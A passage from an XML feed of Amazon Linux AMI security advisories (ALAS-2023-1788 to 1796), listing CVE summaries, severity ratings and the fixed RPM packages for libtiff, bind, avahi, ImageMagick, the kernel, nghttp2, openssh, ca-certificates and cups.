from="linux-security@amazon.com"><id>ALAS-2023-1788</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1788: medium priority package update for libtiff</title><issued date="2023-07-19 22:14:00" /><updated date="2023-07-25 23:24:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-3576:
Memory leak in memory leak in tiffcrop.c.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-3576" title="" id="CVE-2023-3576" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="libtiff-debuginfo" version="4.0.3" release="35.43.amzn1" epoch="0" arch="x86_64"><filename>Packages/libtiff-debuginfo-4.0.3-35.43.amzn1.x86_64.rpm</filename></package><package name="libtiff-devel" version="4.0.3" release="35.43.amzn1" epoch="0" arch="x86_64"><filename>Packages/libtiff-devel-4.0.3-35.43.amzn1.x86_64.rpm</filename></package><package name="libtiff" version="4.0.3" release="35.43.amzn1" epoch="0" arch="x86_64"><filename>Packages/libtiff-4.0.3-35.43.amzn1.x86_64.rpm</filename></package><package name="libtiff-static" version="4.0.3" release="35.43.amzn1" epoch="0" arch="x86_64"><filename>Packages/libtiff-static-4.0.3-35.43.amzn1.x86_64.rpm</filename></package><package name="libtiff-debuginfo" version="4.0.3" release="35.43.amzn1" epoch="0" arch="i686"><filename>Packages/libtiff-debuginfo-4.0.3-35.43.amzn1.i686.rpm</filename></package><package name="libtiff-static" version="4.0.3" release="35.43.amzn1" epoch="0" arch="i686"><filename>Packages/libtiff-static-4.0.3-35.43.amzn1.i686.rpm</filename></package><package name="libtiff-devel" version="4.0.3" release="35.43.amzn1" epoch="0" arch="i686"><filename>Packages/libtiff-devel-4.0.3-35.43.amzn1.i686.rpm</filename></package><package name="libtiff" version="4.0.3" release="35.43.amzn1" epoch="0" arch="i686"><filename>Packages/libtiff-4.0.3-35.43.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1789</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1789: important priority package update for bind</title><issued date="2023-07-19 22:14:00" /><updated date="2023-07-25 23:24:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-2828:
A vulnerability was found in BIND. The effectiveness of the cache-cleaning algorithm used in named can be severely diminished by querying the resolver for specific RRsets in a certain order, effectively allowing the configured max-cache-size limit to exceed significantly.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-2828" title="" id="CVE-2023-2828" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="bind-chroot" version="9.8.2" release="0.68.rc1.90.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-chroot-9.8.2-0.68.rc1.90.amzn1.x86_64.rpm</filename></package><package name="bind" version="9.8.2" release="0.68.rc1.90.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-9.8.2-0.68.rc1.90.amzn1.x86_64.rpm</filename></package><package name="bind-sdb" version="9.8.2" release="0.68.rc1.90.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-sdb-9.8.2-0.68.rc1.90.amzn1.x86_64.rpm</filename></package><package name="bind-libs" version="9.8.2" release="0.68.rc1.90.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-libs-9.8.2-0.68.rc1.90.amzn1.x86_64.rpm</filename></package><package name="bind-utils" version="9.8.2" release="0.68.rc1.90.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-utils-9.8.2-0.68.rc1.90.amzn1.x86_64.rpm</filename></package><package name="bind-debuginfo" version="9.8.2" release="0.68.rc1.90.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-debuginfo-9.8.2-0.68.rc1.90.amzn1.x86_64.rpm</filename></package><package name="bind-devel" version="9.8.2" release="0.68.rc1.90.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-devel-9.8.2-0.68.rc1.90.amzn1.x86_64.rpm</filename></package><package name="bind-chroot" version="9.8.2" release="0.68.rc1.90.amzn1" epoch="32" arch="i686"><filename>Packages/bind-chroot-9.8.2-0.68.rc1.90.amzn1.i686.rpm</filename></package><package name="bind-utils" version="9.8.2" release="0.68.rc1.90.amzn1" epoch="32" arch="i686"><filename>Packages/bind-utils-9.8.2-0.68.rc1.90.amzn1.i686.rpm</filename></package><package name="bind-sdb" version="9.8.2" release="0.68.rc1.90.amzn1" epoch="32" arch="i686"><filename>Packages/bind-sdb-9.8.2-0.68.rc1.90.amzn1.i686.rpm</filename></package><package name="bind-debuginfo" version="9.8.2" release="0.68.rc1.90.amzn1" epoch="32" arch="i686"><filename>Packages/bind-debuginfo-9.8.2-0.68.rc1.90.amzn1.i686.rpm</filename></package><package name="bind" version="9.8.2" release="0.68.rc1.90.amzn1" epoch="32" arch="i686"><filename>Packages/bind-9.8.2-0.68.rc1.90.amzn1.i686.rpm</filename></package><package name="bind-devel" version="9.8.2" release="0.68.rc1.90.amzn1" epoch="32" arch="i686"><filename>Packages/bind-devel-9.8.2-0.68.rc1.90.amzn1.i686.rpm</filename></package><package name="bind-libs" version="9.8.2" release="0.68.rc1.90.amzn1" epoch="32" arch="i686"><filename>Packages/bind-libs-9.8.2-0.68.rc1.90.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1790</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1790: medium priority package update for avahi</title><issued date="2023-08-03 20:16:00" /><updated date="2023-08-08 20:48:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-38471:
A reachable assertion was found in dbus_set_host_name.
CVE-2023-38470:
A reachable assertion was found in avahi_escape_label.
CVE-2023-38469:
A reachable assertion was found in avahi_dns_packet_append_record.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-38469" title="" id="CVE-2023-38469" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-38470" title="" id="CVE-2023-38470" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-38471" title="" id="CVE-2023-38471" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="avahi-glib" version="0.6.25" release="12.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/avahi-glib-0.6.25-12.19.amzn1.x86_64.rpm</filename></package><package name="avahi-tools" version="0.6.25" release="12.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/avahi-tools-0.6.25-12.19.amzn1.x86_64.rpm</filename></package><package name="avahi-gobject" version="0.6.25" release="12.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/avahi-gobject-0.6.25-12.19.amzn1.x86_64.rpm</filename></package><package name="avahi" version="0.6.25" release="12.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/avahi-0.6.25-12.19.amzn1.x86_64.rpm</filename></package><package name="avahi-compat-libdns_sd" version="0.6.25" release="12.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/avahi-compat-libdns_sd-0.6.25-12.19.amzn1.x86_64.rpm</filename></package><package name="avahi-autoipd" version="0.6.25" release="12.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/avahi-autoipd-0.6.25-12.19.amzn1.x86_64.rpm</filename></package><package name="avahi-debuginfo" version="0.6.25" release="12.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/avahi-debuginfo-0.6.25-12.19.amzn1.x86_64.rpm</filename></package><package name="avahi-libs" version="0.6.25" release="12.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/avahi-libs-0.6.25-12.19.amzn1.x86_64.rpm</filename></package><package name="avahi-devel" version="0.6.25" release="12.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/avahi-devel-0.6.25-12.19.amzn1.x86_64.rpm</filename></package><package name="avahi-compat-howl" version="0.6.25" release="12.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/avahi-compat-howl-0.6.25-12.19.amzn1.x86_64.rpm</filename></package><package name="avahi-compat-howl-devel" version="0.6.25" release="12.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/avahi-compat-howl-devel-0.6.25-12.19.amzn1.x86_64.rpm</filename></package><package name="avahi-gobject-devel" version="0.6.25" release="12.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/avahi-gobject-devel-0.6.25-12.19.amzn1.x86_64.rpm</filename></package><package name="avahi-dnsconfd" version="0.6.25" release="12.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/avahi-dnsconfd-0.6.25-12.19.amzn1.x86_64.rpm</filename></package><package name="avahi-glib-devel" version="0.6.25" release="12.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/avahi-glib-devel-0.6.25-12.19.amzn1.x86_64.rpm</filename></package><package name="avahi-compat-libdns_sd-devel" version="0.6.25" release="12.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/avahi-compat-libdns_sd-devel-0.6.25-12.19.amzn1.x86_64.rpm</filename></package><package name="avahi-compat-howl" version="0.6.25" release="12.19.amzn1" epoch="0" arch="i686"><filename>Packages/avahi-compat-howl-0.6.25-12.19.amzn1.i686.rpm</filename></package><package name="avahi-devel" version="0.6.25" release="12.19.amzn1" epoch="0" arch="i686"><filename>Packages/avahi-devel-0.6.25-12.19.amzn1.i686.rpm</filename></package><package name="avahi-gobject-devel" version="0.6.25" release="12.19.amzn1" epoch="0" arch="i686"><filename>Packages/avahi-gobject-devel-0.6.25-12.19.amzn1.i686.rpm</filename></package><package name="avahi-dnsconfd" version="0.6.25" release="12.19.amzn1" epoch="0" arch="i686"><filename>Packages/avahi-dnsconfd-0.6.25-12.19.amzn1.i686.rpm</filename></package><package name="avahi-autoipd" version="0.6.25" release="12.19.amzn1" epoch="0" arch="i686"><filename>Packages/avahi-autoipd-0.6.25-12.19.amzn1.i686.rpm</filename></package><package name="avahi-gobject" version="0.6.25" release="12.19.amzn1" epoch="0" arch="i686"><filename>Packages/avahi-gobject-0.6.25-12.19.amzn1.i686.rpm</filename></package><package name="avahi-libs" version="0.6.25" release="12.19.amzn1" epoch="0" arch="i686"><filename>Packages/avahi-libs-0.6.25-12.19.amzn1.i686.rpm</filename></package><package name="avahi-tools" version="0.6.25" release="12.19.amzn1" epoch="0" arch="i686"><filename>Packages/avahi-tools-0.6.25-12.19.amzn1.i686.rpm</filename></package><package name="avahi-glib" version="0.6.25" release="12.19.amzn1" epoch="0" arch="i686"><filename>Packages/avahi-glib-0.6.25-12.19.amzn1.i686.rpm</filename></package><package name="avahi-compat-libdns_sd-devel" version="0.6.25" release="12.19.amzn1" epoch="0" arch="i686"><filename>Packages/avahi-compat-libdns_sd-devel-0.6.25-12.19.amzn1.i686.rpm</filename></package><package name="avahi-compat-libdns_sd" version="0.6.25" release="12.19.amzn1" epoch="0" arch="i686"><filename>Packages/avahi-compat-libdns_sd-0.6.25-12.19.amzn1.i686.rpm</filename></package><package name="avahi-glib-devel" version="0.6.25" release="12.19.amzn1" epoch="0" arch="i686"><filename>Packages/avahi-glib-devel-0.6.25-12.19.amzn1.i686.rpm</filename></package><package name="avahi-compat-howl-devel" version="0.6.25" release="12.19.amzn1" epoch="0" arch="i686"><filename>Packages/avahi-compat-howl-devel-0.6.25-12.19.amzn1.i686.rpm</filename></package><package name="avahi" version="0.6.25" release="12.19.amzn1" epoch="0" arch="i686"><filename>Packages/avahi-0.6.25-12.19.amzn1.i686.rpm</filename></package><package name="avahi-debuginfo" version="0.6.25" release="12.19.amzn1" epoch="0" arch="i686"><filename>Packages/avahi-debuginfo-0.6.25-12.19.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1791</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1791: medium priority package update for ImageMagick</title><issued date="2023-08-03 20:16:00" /><updated date="2023-08-08 20:48:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-3745:
A heap-based buffer overflow issue was found in ImageMagick's PushCharPixel() function in quantum-private.h. This issue may allow a local attacker to trick the user into opening a specially crafted file, triggering an out-of-bounds read error and allowing an application to crash, resulting in a denial of service.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-3745" title="" id="CVE-2023-3745" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="ImageMagick-debuginfo" version="6.9.10.97" release="1.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/ImageMagick-debuginfo-6.9.10.97-1.27.amzn1.x86_64.rpm</filename></package><package name="ImageMagick" version="6.9.10.97" release="1.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/ImageMagick-6.9.10.97-1.27.amzn1.x86_64.rpm</filename></package><package name="ImageMagick-c++" version="6.9.10.97" release="1.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/ImageMagick-c++-6.9.10.97-1.27.amzn1.x86_64.rpm</filename></package><package name="ImageMagick-devel" version="6.9.10.97" release="1.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/ImageMagick-devel-6.9.10.97-1.27.amzn1.x86_64.rpm</filename></package><package name="ImageMagick-perl" version="6.9.10.97" release="1.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/ImageMagick-perl-6.9.10.97-1.27.amzn1.x86_64.rpm</filename></package><package name="ImageMagick-c++-devel" version="6.9.10.97" release="1.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/ImageMagick-c++-devel-6.9.10.97-1.27.amzn1.x86_64.rpm</filename></package><package name="ImageMagick-doc" version="6.9.10.97" release="1.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/ImageMagick-doc-6.9.10.97-1.27.amzn1.x86_64.rpm</filename></package><package name="ImageMagick-doc" version="6.9.10.97" release="1.27.amzn1" epoch="0" arch="i686"><filename>Packages/ImageMagick-doc-6.9.10.97-1.27.amzn1.i686.rpm</filename></package><package name="ImageMagick-debuginfo" version="6.9.10.97" release="1.27.amzn1" epoch="0" arch="i686"><filename>Packages/ImageMagick-debuginfo-6.9.10.97-1.27.amzn1.i686.rpm</filename></package><package name="ImageMagick-c++" version="6.9.10.97" release="1.27.amzn1" epoch="0" arch="i686"><filename>Packages/ImageMagick-c++-6.9.10.97-1.27.amzn1.i686.rpm</filename></package><package name="ImageMagick-devel" version="6.9.10.97" release="1.27.amzn1" epoch="0" arch="i686"><filename>Packages/ImageMagick-devel-6.9.10.97-1.27.amzn1.i686.rpm</filename></package><package name="ImageMagick-perl" version="6.9.10.97" release="1.27.amzn1" epoch="0" arch="i686"><filename>Packages/ImageMagick-perl-6.9.10.97-1.27.amzn1.i686.rpm</filename></package><package name="ImageMagick-c++-devel" version="6.9.10.97" release="1.27.amzn1" epoch="0" arch="i686"><filename>Packages/ImageMagick-c++-devel-6.9.10.97-1.27.amzn1.i686.rpm</filename></package><package name="ImageMagick" version="6.9.10.97" release="1.27.amzn1" epoch="0" arch="i686"><filename>Packages/ImageMagick-6.9.10.97-1.27.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1792</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1792: important priority package update for kernel</title><issued date="2023-08-03 20:16:00" /><updated date="2023-08-08 20:48:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-3776:
A use-after-free vulnerability in the Linux kernel's net/sched: cls_fw component can be exploited to achieve local privilege escalation.
If tcf_change_indev() fails, fw_set_parms() will immediately return an error after incrementing or decrementing the reference counter in tcf_bind_filter(). If an attacker can control the reference counter and set it to zero, they can cause the reference to be freed, leading to a use-after-free vulnerability.
We recommend upgrading past commit 0323bce598eea038714f941ce2b22541c46d488f.
CVE-2023-3611:
An out-of-bounds write vulnerability in the Linux kernel's net/sched: sch_qfq component can be exploited to achieve local privilege escalation.
The qfq_change_agg() function in net/sched/sch_qfq.c allows an out-of-bounds write because lmax is updated according to packet sizes without bounds checks.
We recommend upgrading past commit 3e337087c3b5805fe0b8a46ba622a962880b5d64.
CVE-2023-3609:
A use-after-free vulnerability in the Linux kernel's net/sched: cls_u32 component can be exploited to achieve local privilege escalation.
If tcf_change_indev() fails, u32_set_parms() will immediately return an error after incrementing or decrementing the reference counter in tcf_bind_filter(). If an attacker can control the reference counter and set it to zero, they can cause the reference to be freed, leading to a use-after-free vulnerability.
We recommend upgrading past commit 04c55383fa5689357bcdd2c8036725a55ed632bc.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-3609" title="" id="CVE-2023-3609" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-3611" title="" id="CVE-2023-3611" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-3776" title="" id="CVE-2023-3776" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="kernel" version="4.14.320" release="169.544.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-4.14.320-169.544.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="4.14.320" release="169.544.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-4.14.320-169.544.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.14.320" release="169.544.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-4.14.320-169.544.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="4.14.320" release="169.544.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-4.14.320-169.544.amzn1.x86_64.rpm</filename></package><package name="perf" version="4.14.320" release="169.544.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-4.14.320-169.544.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="4.14.320" release="169.544.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-4.14.320-169.544.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.320" release="169.544.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-4.14.320-169.544.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-devel" version="4.14.320" release="169.544.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-devel-4.14.320-169.544.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="4.14.320" release="169.544.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-4.14.320-169.544.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="4.14.320" release="169.544.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-4.14.320-169.544.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.320" release="169.544.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-4.14.320-169.544.amzn1.i686.rpm</filename></package><package name="kernel" version="4.14.320" release="169.544.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-4.14.320-169.544.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="4.14.320" release="169.544.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-4.14.320-169.544.amzn1.i686.rpm</filename></package><package name="perf-debuginfo" version="4.14.320" release="169.544.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-4.14.320-169.544.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="4.14.320" release="169.544.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-4.14.320-169.544.amzn1.i686.rpm</filename></package><package name="kernel-tools-devel" version="4.14.320" release="169.544.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-4.14.320-169.544.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="4.14.320" release="169.544.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-4.14.320-169.544.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="4.14.320" release="169.544.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-4.14.320-169.544.amzn1.i686.rpm</filename></package><package name="perf" version="4.14.320" release="169.544.amzn1" epoch="0" arch="i686"><filename>Packages/perf-4.14.320-169.544.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="4.14.320" release="169.544.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-4.14.320-169.544.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1793</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1793: important priority package update for nghttp2</title><issued date="2023-08-03 20:16:00" /><updated date="2023-08-08 20:52:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-35945:
Envoy is a cloud-native high-performance edge/middle/service proxy. Envoy's HTTP/2 codec may leak a header map and bookkeeping structures upon receiving `RST_STREAM` immediately followed by the `GOAWAY` frames from an upstream server. In nghttp2, cleanup of pending requests due to receipt of the `GOAWAY` frame skips de-allocation of the bookkeeping structure and pending compressed header. The error return [code path] is taken if connection is already marked for not sending more requests due to `GOAWAY` frame. The clean-up code is right after the return statement, causing memory leak. Denial of service through memory exhaustion. This vulnerability was patched in versions(s) 1.26.3, 1.25.8, 1.24.9, 1.23.11.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-35945" title="" id="CVE-2023-35945" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="nghttp2" version="1.33.0" release="1.1.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/nghttp2-1.33.0-1.1.7.amzn1.x86_64.rpm</filename></package><package name="libnghttp2" version="1.33.0" release="1.1.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/libnghttp2-1.33.0-1.1.7.amzn1.x86_64.rpm</filename></package><package name="nghttp2-debuginfo" version="1.33.0" release="1.1.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/nghttp2-debuginfo-1.33.0-1.1.7.amzn1.x86_64.rpm</filename></package><package name="libnghttp2-devel" version="1.33.0" release="1.1.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/libnghttp2-devel-1.33.0-1.1.7.amzn1.x86_64.rpm</filename></package><package name="libnghttp2" version="1.33.0" release="1.1.7.amzn1" epoch="0" arch="i686"><filename>Packages/libnghttp2-1.33.0-1.1.7.amzn1.i686.rpm</filename></package><package name="nghttp2" version="1.33.0" release="1.1.7.amzn1" epoch="0" arch="i686"><filename>Packages/nghttp2-1.33.0-1.1.7.amzn1.i686.rpm</filename></package><package name="nghttp2-debuginfo" version="1.33.0" release="1.1.7.amzn1" epoch="0" arch="i686"><filename>Packages/nghttp2-debuginfo-1.33.0-1.1.7.amzn1.i686.rpm</filename></package><package name="libnghttp2-devel" version="1.33.0" release="1.1.7.amzn1" epoch="0" arch="i686"><filename>Packages/libnghttp2-devel-1.33.0-1.1.7.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1794</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1794: medium priority package update for openssh</title><issued date="2023-08-03 20:16:00" /><updated date="2023-08-08 20:52:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-35812:
An issue was discovered in OpenSSH 7.4 on Amazon Linux 2 and Amazon Linux 1. The fix for CVE-2019-6111 only covered cases where an absolute path is passed to scp. When a relative path is used there is no verification that the name of a file received by the client matches the file requested.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-35812" title="" id="CVE-2023-35812" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="openssh-server" version="7.4p1" release="22.78.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssh-server-7.4p1-22.78.amzn1.x86_64.rpm</filename></package><package name="openssh" version="7.4p1" release="22.78.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssh-7.4p1-22.78.amzn1.x86_64.rpm</filename></package><package name="pam_ssh_agent_auth" version="0.10.3" release="2.22.78.amzn1" epoch="0" arch="x86_64"><filename>Packages/pam_ssh_agent_auth-0.10.3-2.22.78.amzn1.x86_64.rpm</filename></package><package name="openssh-ldap" version="7.4p1" release="22.78.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssh-ldap-7.4p1-22.78.amzn1.x86_64.rpm</filename></package><package name="openssh-clients" version="7.4p1" release="22.78.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssh-clients-7.4p1-22.78.amzn1.x86_64.rpm</filename></package><package name="openssh-cavs" version="7.4p1" release="22.78.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssh-cavs-7.4p1-22.78.amzn1.x86_64.rpm</filename></package><package name="openssh-debuginfo" version="7.4p1" release="22.78.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssh-debuginfo-7.4p1-22.78.amzn1.x86_64.rpm</filename></package><package name="openssh-keycat" version="7.4p1" release="22.78.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssh-keycat-7.4p1-22.78.amzn1.x86_64.rpm</filename></package><package name="openssh-clients" version="7.4p1" release="22.78.amzn1" epoch="0" arch="i686"><filename>Packages/openssh-clients-7.4p1-22.78.amzn1.i686.rpm</filename></package><package name="openssh-debuginfo" version="7.4p1" release="22.78.amzn1" epoch="0" arch="i686"><filename>Packages/openssh-debuginfo-7.4p1-22.78.amzn1.i686.rpm</filename></package><package name="openssh-keycat" version="7.4p1" release="22.78.amzn1" epoch="0" arch="i686"><filename>Packages/openssh-keycat-7.4p1-22.78.amzn1.i686.rpm</filename></package><package name="openssh-ldap" version="7.4p1" release="22.78.amzn1" epoch="0" arch="i686"><filename>Packages/openssh-ldap-7.4p1-22.78.amzn1.i686.rpm</filename></package><package name="openssh-server" version="7.4p1" release="22.78.amzn1" epoch="0" arch="i686"><filename>Packages/openssh-server-7.4p1-22.78.amzn1.i686.rpm</filename></package><package name="openssh-cavs" version="7.4p1" release="22.78.amzn1" epoch="0" arch="i686"><filename>Packages/openssh-cavs-7.4p1-22.78.amzn1.i686.rpm</filename></package><package name="pam_ssh_agent_auth" version="0.10.3" release="2.22.78.amzn1" epoch="0" arch="i686"><filename>Packages/pam_ssh_agent_auth-0.10.3-2.22.78.amzn1.i686.rpm</filename></package><package name="openssh" version="7.4p1" release="22.78.amzn1" epoch="0" arch="i686"><filename>Packages/openssh-7.4p1-22.78.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1795</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1795: important priority package update for ca-certificates</title><issued date="2023-08-03 20:16:00" /><updated date="2023-08-08 20:52:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-32803:
An initial fix in Amazon Linux ca-certificates package relating to CVE-2022-23491 did not properly remove root certificates from TrustCor from the root store.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-32803" title="" id="CVE-2023-32803" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="ca-certificates" version="2018.2.22" release="65.1.30.amzn1" epoch="0" arch="noarch"><filename>Packages/ca-certificates-2018.2.22-65.1.30.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1796</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1796: medium priority package update for cups</title><issued date="2023-08-03 20:16:00" /><updated date="2023-08-08 20:52:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-32324:
OpenPrinting CUPS is an open source printing system. In versions 2.4.2 and prior, a heap buffer overflow vulnerability would allow a remote attacker to launch a denial of service (DoS) attack. A buffer overflow vulnerability in the function `format_log_line` could allow remote attackers to cause a DoS on the affected system. Exploitation of the vulnerability can be triggered when the configuration file `cupsd.conf` sets the value of `loglevel `to `DEBUG`. No known patches or workarounds exist at time of publication.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-32324" title="" id="CVE-2023-32324" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="cups" version="1.4.2" release="67.23.amzn1" epoch="1" arch="x86_64"><filename>Packages/cups-1.4.2-67.23.amzn1.x86_64.rpm</filename></package><package name="cups-lpd" version="1.4.2" release="67.23.amzn1" epoch="1" arch="x86_64"><filename>Packages/cups-lpd-1.4.2-67.23.amzn1.x86_64.rpm</filename></package><package name="cups-libs" version="1.4.2" release="67.23.amzn1" epoch="1" arch="x86_64"><filename>Packages/cups-libs-1.4.2-67.23.amzn1.x86_64.rpm</filename></package><package name="cups-devel" version="1.4.2" release="67.23.amzn1" epoch="1" arch="x86_64"><filename>Packages/cups-devel-1.4.2-67.23.amzn1.x86_64.rpm</filename></package><package name="cups-debuginfo" version="1.4.2" release="67.23.amzn1" epoch="1" arch="x86_64"><filename>Packages/cups-debuginfo-1.4.2-67.23.amzn1.x86_64.rpm</filename></package><package name="cups-php" version="1.4.2" release="67.23.amzn1" epoch="1" 